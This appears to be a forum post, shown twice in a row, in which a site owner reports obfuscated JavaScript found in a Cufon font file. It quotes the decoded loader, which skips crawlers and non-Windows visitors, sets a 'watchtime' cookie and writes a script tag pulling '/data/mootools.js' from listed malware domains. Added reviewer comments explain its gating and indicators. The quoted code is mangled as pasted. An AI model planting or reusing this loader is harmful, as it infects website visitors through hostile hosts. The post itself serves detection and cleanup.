That writes a script tag into the document with the following payload:
// NOTE(review): analyst annotations on the quoted payload; the code line below is left exactly as posted.
// As pasted it is not valid JavaScript: `Math.random()doms.length` suggests the `*` operators were
// stripped by the forum's formatting (the expiry offset `736003600` may be affected the same way — unconfirmed),
// and the final document.write() string is truncated and missing quotes.
// Gate: the body runs only when (1) document.cookie does not contain 'watchtime', (2) the user agent
// does not match the crawler pattern (yahoo|search|msnbot|yandex|googlebot|bing|ask), and
// (3) navigator.appVersion contains 'win'. Crawlers, non-Windows visitors and visitors who already hold
// the cookie never receive the injected tag, which likely makes the infection harder to spot with scanners.
// Action: picks a random entry from `doms` and from `preffs`, sets the 'watchtime' cookie (path=/) with a
// future expiry, then document.write()s a <script> tag whose src is built from the prefix, the domain and
// '/data/mootools.js' — presumably named to resemble the MooTools library.
// Indicators visible here: cookie name 'watchtime', the four hostnames in `doms`, the colour-name
// subdomain prefixes in `preffs`, and the '/data/mootools.js' path. Matching on the hostnames alone is
// brittle, since the list lives in the injected file and can be swapped; the modified file itself needs
// to be restored from a known-good copy and the write path that changed it identified.
var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()doms.length); var pref = Math.floor(Math.random()preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };
I think this is malicious (a cursory search for emapis.org shows it to be a malware site).
I'm not super familiar with cufon, but this does not appear to be kosher.
document.write(unescape(...gibberish...))
That writes a script tag into the document with the following payload:
// NOTE(review): analyst annotations on the quoted payload; the code line below is left exactly as posted.
// As pasted it is not valid JavaScript: `Math.random()doms.length` suggests the `*` operators were
// stripped by the forum's formatting (the expiry offset `736003600` may be affected the same way — unconfirmed),
// and the final document.write() string is truncated and missing quotes.
// Gate: the body runs only when (1) document.cookie does not contain 'watchtime', (2) the user agent
// does not match the crawler pattern (yahoo|search|msnbot|yandex|googlebot|bing|ask), and
// (3) navigator.appVersion contains 'win'. Crawlers, non-Windows visitors and visitors who already hold
// the cookie never receive the injected tag, which likely makes the infection harder to spot with scanners.
// Action: picks a random entry from `doms` and from `preffs`, sets the 'watchtime' cookie (path=/) with a
// future expiry, then document.write()s a <script> tag whose src is built from the prefix, the domain and
// '/data/mootools.js' — presumably named to resemble the MooTools library.
// Indicators visible here: cookie name 'watchtime', the four hostnames in `doms`, the colour-name
// subdomain prefixes in `preffs`, and the '/data/mootools.js' path. Matching on the hostnames alone is
// brittle, since the list lives in the injected file and can be swapped; the modified file itself needs
// to be restored from a known-good copy and the write path that changed it identified.
var dc = document.cookie; var cname = 'watchtime'; var wn = window.navigator.userAgent; var stri = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i; var strOS = navigator.appVersion; if(dc.indexOf(cname)==-1 && !wn.toLowerCase().match(stri) && strOS.toLowerCase().indexOf('win') != -1) { var doms = ['edisonsnightclub.com','emapis.org','ideacoreportal.com','karenegren.com']; var preffs = ['aqua.','azure.','black.','blue.','brown.','gold.','gray.','green.','lime.','navy.','olive.','plum.','red.','snow.','white.','yellow.']; var dom = Math.floor(Math.random()doms.length); var pref = Math.floor(Math.random()preffs.length); dt=new Date();dt.setTime(dt.getTime() + 736003600);document.cookie=cname+'='+escape(cname)+';expires='+dt.toGMTString()+';path=/'; document.write('<script type="text/javascript" src="http://+preffs[pref]+doms[dom]+/data/mootools.js><\/...); };
I think this is malicious (a cursory search for emapis.org shows it to be a malware site).
I'm not super familiar with cufon, but this does not appear to be kosher.
Here is a link that may prove useful: http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpre...